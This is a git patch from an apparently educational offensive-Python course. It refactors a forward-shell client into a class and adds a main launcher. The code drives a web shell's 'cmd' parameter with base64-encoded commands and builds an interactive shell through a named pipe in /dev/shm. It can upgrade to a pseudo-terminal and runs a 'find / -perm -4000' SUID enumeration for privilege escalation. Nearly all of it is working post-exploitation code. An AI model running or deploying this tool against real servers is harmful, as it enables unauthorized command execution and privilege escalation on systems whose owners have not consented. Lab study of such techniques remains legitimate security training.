From d7252c6782d4eab1eb48f3db0ecbd3d1d3f46a5a Mon Sep 17 00:00:00 2001 From: Manuel Vergara Date: Sat, 3 Feb 2024 12:28:27 +0100 Subject: [PATCH] Update forwardshell script --- .../15_hacking/12_fs/script/forwardshell.py | 146 +++++++++++++++--- .../15_hacking/12_fs/script/main.py | 29 ++++ 2 files changed, 154 insertions(+), 21 deletions(-) create mode 100644 python-ofensivo/15_hacking/12_fs/script/main.py diff --git a/python-ofensivo/15_hacking/12_fs/script/forwardshell.py b/python-ofensivo/15_hacking/12_fs/script/forwardshell.py index 3c6725d..26ccebb 100644 --- a/python-ofensivo/15_hacking/12_fs/script/forwardshell.py +++ b/python-ofensivo/15_hacking/12_fs/script/forwardshell.py @@ -11,41 +11,145 @@ mkfifo input; tail -f input | /bin/sh 2>&1 > output """ import requests -import signal -import sys +import time from termcolor import colored from base64 import b64encode - -def def_handler(sig, frame): - - print(colored("\n[!] Exiting...", "blue")) - sys.exit(1) +from random import randrange -signal.signal(signal.SIGINT, def_handler) +class ForwardShell: -main_url = "http://localhost/index.php" + def __init__(self): + + session = randrange(100000, 999999) + + self.main_url = "http://localhost/index.php" + + self.stdin = f"/dev/shm/{session}.input" + self.stdout = f"/dev/shm/{session}.output" + + self.help_options = { + 'enum suid': 'FileSystem SUID Privileges Enumeration', + 'help': 'Show this help panel', + } + + self.is_pseudo_terminal = False + + def run_command(self, command): + + command = b64encode(command.encode()).decode() + + data = { + 'cmd': 'echo "%s" | base64 -d | /bin/sh' % command + } + + try: + r = requests.get(self.main_url, params=data, timeout=5) + + return r.text + + except: + pass + + return None + + def write_stdin(self, command): + + command = b64encode(command.encode()).decode() + + data = { + 'cmd': 'echo "%s" | base64 -d > %s' % (command, self.stdin) + } + + r = requests.get(self.main_url, params=data) + + def read_stdout(self): + + for _ in range(5): + + read_stdout_command = f"/bin/cat {self.stdout}" + output_command = self.run_command(read_stdout_command) + time.sleep(0.2) + + return output_command + + def setup_shell(self): + + command = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}" + self.run_command(command) + + def remove_data(self): + + remove_data_command = f"/bin/rm {self.stdin} {self.stdout}" + self.run_command(remove_data_command) + + def clear_stdout(self): + + clear_stdout_command = f"echo '' > {self.stdout}" + self.run_command(clear_stdout_command) + + def run(self) -> None: + + self.setup_shell() + + while True: + + command = input(colored("> ", "yellow")) + + if "script /dev/null -c bash" in command: + + print( + colored("[+] Se ha iniciado una pseudo-terminal", "blue")) + self.is_pseudo_terminal = True -def run_command(command): + if command.strip() == "enum suid": - command = b64encode(command.encode()).decode() + command = f"find / -perm -4000 2>/dev/null | xargs ls -l" - data = { - 'cmd': 'echo "%s" | base64 -d | /bin/sh' % command - } + if command.strip() == "help": - r = requests.get(main_url, params=data) + print(colored(f"\n[+] Listando panel de ayuda:\n", "blue")) - return r.text + for key, value in self.help_options.items(): + print(f"\t{key} - {value}") + + continue + + self.write_stdin(command + "\n") + + output_command = self.read_stdout() + + if command.strip() == "exit": + + self.is_pseudo_terminal = False + print(colored("[+] Se ha cerrado la pseudo-terminal", "blue")) + + self.clear_stdout() + continue -if __name__ == '__main__': + if self.is_pseudo_terminal: + lines = output_command.split("\n") - while True: + if len(lines) == 1: - command = input(colored("> ", "yellow")) - output_command = run_command(command) + cleared_output = '\n'.join([lines[-1]] + lines[:1]) - print(output_command) + elif len(lines) > 1: + + cleared_output = '\n'.join( + [lines[-1]] + lines[:1] + lines[2:-1]) + + else: + print(len(lines)) + print(lines) + + print(cleared_output + "\n") + + else: + + print(output_command) + + self.clear_stdout() diff --git a/python-ofensivo/15_hacking/12_fs/script/main.py b/python-ofensivo/15_hacking/12_fs/script/main.py new file mode 100644 index 0000000..c951144 --- /dev/null +++ b/python-ofensivo/15_hacking/12_fs/script/main.py @@ -0,0 +1,29 @@ + +#!/usr/bin/env python3 +""" +Fichero principal de la aplicaciĆ³n. +""" + +import signal +import sys + +from forwardshell import ForwardShell +from termcolor import colored + + +def def_handler(sig, frame) -> None: + + print(colored("\n[!] Exiting...", "blue")) + + my_forward_shell.remove_data() + + sys.exit(1) + + +signal.signal(signal.SIGINT, def_handler) + + +if __name__ == '__main__': + + my_forward_shell = ForwardShell() + my_forward_shell.run()